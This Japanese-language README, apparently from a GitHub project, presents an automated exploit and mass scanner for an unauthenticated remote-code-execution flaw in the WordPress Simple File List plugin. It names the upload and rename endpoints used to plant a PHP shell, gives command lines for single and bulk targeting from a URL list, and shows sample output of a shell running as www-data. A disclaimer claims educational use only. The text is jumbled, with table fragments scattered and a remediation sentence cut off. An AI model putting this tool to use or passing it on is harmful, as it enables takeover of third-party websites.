
WordPress Simple File List 未認証リモートコード実行エクスプロイト
CVE-2025-34085 の自動エクスプロイトおよびスキャナーです。これは WordPress Simple File List プラグインの重大な脆弱性であり、任意ファイルのアップロードおよびリネーム機能を悪用することで認証なしリモートコード実行を可能にします。
認証なしファイルアップロード
/wp-content/plugins/simple-file-list/ee-upload-engine.phpPHP 拡張子へリネーム
.php または類似の拡張子にリネーム(経由:/wp-content/plugins/simple-file-list/ee-file-engine.php)ペイロードを実行
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
ターゲットURLを targets.txt に記述(1行に1つ)し、次のコマンドを実行:
python3 CVE-2025-34085.py --cmd "whoami"
| 引数 | 説明 |
|---|---|
-u | ターゲットURL(例: http://example.com) |
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
成功したターゲットは vuln.txt に保存されます。
CVE-2025-34085.py — メインのエクスプロイトスクリプトtargets.txt — (オプション)ターゲットドメインのリストvuln.txt — 成功したエクスプロイトのログ管理者は以下を実施すべきです:
このプロジェクトは教育目的および許可されたテスト目的のみで使用されることを意図しています。 作者は、このツールの誤用または損害について一切の責任を負いません。
このプロジェクトは MIT ライセンス の下でライセンスされています。 📄 ライセンス全文を表示
0xgh057r3c0n 🔗 GitHub: github.com/0xgh057r3c0n
--cmd |
リモートシェルで実行するコマンド(デフォルト: id) |
--inline | インラインペイロードを使用(?cmd= パラメータなし) |